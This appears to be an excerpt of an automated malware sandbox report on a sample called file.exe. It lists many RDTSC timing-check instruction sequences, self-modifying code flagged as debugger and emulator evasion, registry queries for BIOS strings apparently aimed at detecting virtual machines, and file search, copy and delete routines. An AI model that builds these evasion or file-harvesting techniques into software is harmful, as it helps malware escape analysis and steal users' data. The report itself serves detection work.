                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357B51 second address: 1357B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007FF8E8F8DBB6h 0x0000000c jmp 00007FF8E8F8DBBCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1357B6B second address: 1357B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135800D second address: 1358013 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1358013 second address: 1358021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007FF8E8F833B8h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FC97 second address: 135FCA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jl 00007FF8E8F8DBB6h 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DFEB second address: 135DFF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E2AB second address: 135E2B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E441 second address: 135E450 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF8E8F833BAh 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135E9C9 second address: 135E9FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF8E8F8DBB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8E8F8DBBAh 0x00000012 jmp 00007FF8E8F8DBC8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135ECA6 second address: 135ECAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135ECAA second address: 135ECB7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F3CD second address: 135F40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 jmp 00007FF8E8F833C9h 0x0000000c jg 00007FF8E8F833B6h 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 jnp 00007FF8E8F833BEh 0x0000001f jng 00007FF8E8F833B6h 0x00000025 pushad 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F40C second address: 135F412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135F412 second address: 135F416 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FB47 second address: 135FB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D9E2 second address: 135D9EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135D9EE second address: 135DA0D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8E8F8DBB6h 0x00000008 jmp 00007FF8E8F8DBC5h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA0D second address: 135DA19 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA19 second address: 135DA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA1F second address: 135DA23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA23 second address: 135DA34 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA34 second address: 135DA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135DA38 second address: 135DA3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1365556 second address: 136555E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368170 second address: 136817F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136817F second address: 13681BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jp 00007FF8E8F833B6h 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FF8E8F833C2h 0x00000017 jng 00007FF8E8F833B6h 0x0000001d push ecx 0x0000001e pop ecx 0x0000001f popad 0x00000020 jmp 00007FF8E8F833BFh 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136831D second address: 1368323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368323 second address: 136832C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136832C second address: 1368332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368332 second address: 1368336 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368336 second address: 1368346 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FF8E8F8DBC2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368495 second address: 13684B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FF8E8F833B6h 0x00000009 jbe 00007FF8E8F833B6h 0x0000000f jmp 00007FF8E8F833BEh 0x00000014 popad 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1369D1E second address: 1369D22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136C083 second address: 136C097 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1378E9F second address: 1378EB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FF8E8F8DBB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jo 00007FF8E8F8DBCFh 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138AE85 second address: 138AEAB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF8E8F833BEh 0x0000000a pop edi 0x0000000b pushad 0x0000000c jmp 00007FF8E8F833BDh 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138AEAB second address: 138AEE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FF8E8F8DBBFh 0x00000012 popad 0x00000013 jmp 00007FF8E8F8DBC0h 0x00000018 jl 00007FF8E8F8DBC2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 138AEE0 second address: 138AEE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390872 second address: 1390887 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FF8E8F8DBBCh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390887 second address: 13908A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF8E8F833BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007FF8E8F833B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13908A5 second address: 13908A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390CC1 second address: 1390CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FF8E8F833C5h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390CDF second address: 1390CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390CE3 second address: 1390CEF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390CEF second address: 1390D13 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF8E8F8DBB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FF8E8F8DBBAh 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 js 00007FF8E8F8DBBCh 0x0000001a jp 00007FF8E8F8DBB6h 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1390D13 second address: 1390D17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391291 second address: 13912A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 je 00007FF8E8F8DBB6h 0x0000000b ja 00007FF8E8F8DBB6h 0x00000011 pop edx 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1391D0D second address: 1391D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139790A second address: 1397917 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jno 00007FF8E8F8DBB6h 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1399315 second address: 139931B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 139931B second address: 1399328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007FF8E8F8DBB6h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B66AF second address: 13B66C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F833BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B66C1 second address: 13B66D0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF8E8F8DBBAh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6EAD second address: 13C6ECB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF8E8F833C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007FF8E8F833B6h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C61F1 second address: 13C61F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C65D5 second address: 13C65DA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C65DA second address: 13C6615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF8E8F8DBB6h 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF8E8F8DBC6h 0x00000012 jmp 00007FF8E8F8DBC8h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6615 second address: 13C6633 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF8E8F833B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop edi 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jc 00007FF8E8F833B6h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C6633 second address: 13C6639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C984B second address: 13C984F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9A40 second address: 13C9A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9A45 second address: 13C9A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9A4B second address: 13C9A4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9AF8 second address: 13C9B27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FF8E8F833B6h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f and edx, dword ptr [ebp+122D3592h] 0x00000015 push 00000004h 0x00000017 mov dword ptr [ebp+122D254Ch], esi 0x0000001d call 00007FF8E8F833B9h 0x00000022 js 00007FF8E8F833C4h 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9B27 second address: 13C9B2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9B2D second address: 13C9B49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FF8E8F833C4h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9B49 second address: 13C9B60 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jnp 00007FF8E8F8DBB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9B60 second address: 13C9B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9B65 second address: 13C9B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9DB9 second address: 13C9DDB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF8E8F833C8h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13C9DDB second address: 13C9E47 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF8E8F8DBC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or edx, 5B57759Ah 0x00000011 mov edx, dword ptr [ebp+1247B146h] 0x00000017 push dword ptr [ebp+122D3186h] 0x0000001d push 00000000h 0x0000001f push eax 0x00000020 call 00007FF8E8F8DBB8h 0x00000025 pop eax 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc eax 0x00000033 push eax 0x00000034 ret 0x00000035 pop eax 0x00000036 ret 0x00000037 push 34B73AD2h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF8E8F8DBC2h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CCD41 second address: 13CCD45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CCD45 second address: 13CCD4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13CC8C4 second address: 13CC8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530356 second address: 553038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF8E8F8DBBEh 0x00000012 or eax, 0F1EFB78h 0x00000018 jmp 00007FF8E8F8DBBBh 0x0000001d popfd 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553038B second address: 553039B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553039B second address: 55303A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553040E second address: 5530414 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530414 second address: 553041A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553041A second address: 553041E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 553041E second address: 5530443 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF8E8F8DBC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530443 second address: 5530447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5530447 second address: 553044D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1141902 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 11419D0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 12F34BB instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00EF38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EF4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00EEDA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00EEE430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00EF4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00EEED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EE16D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00EF3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00EEF6B0
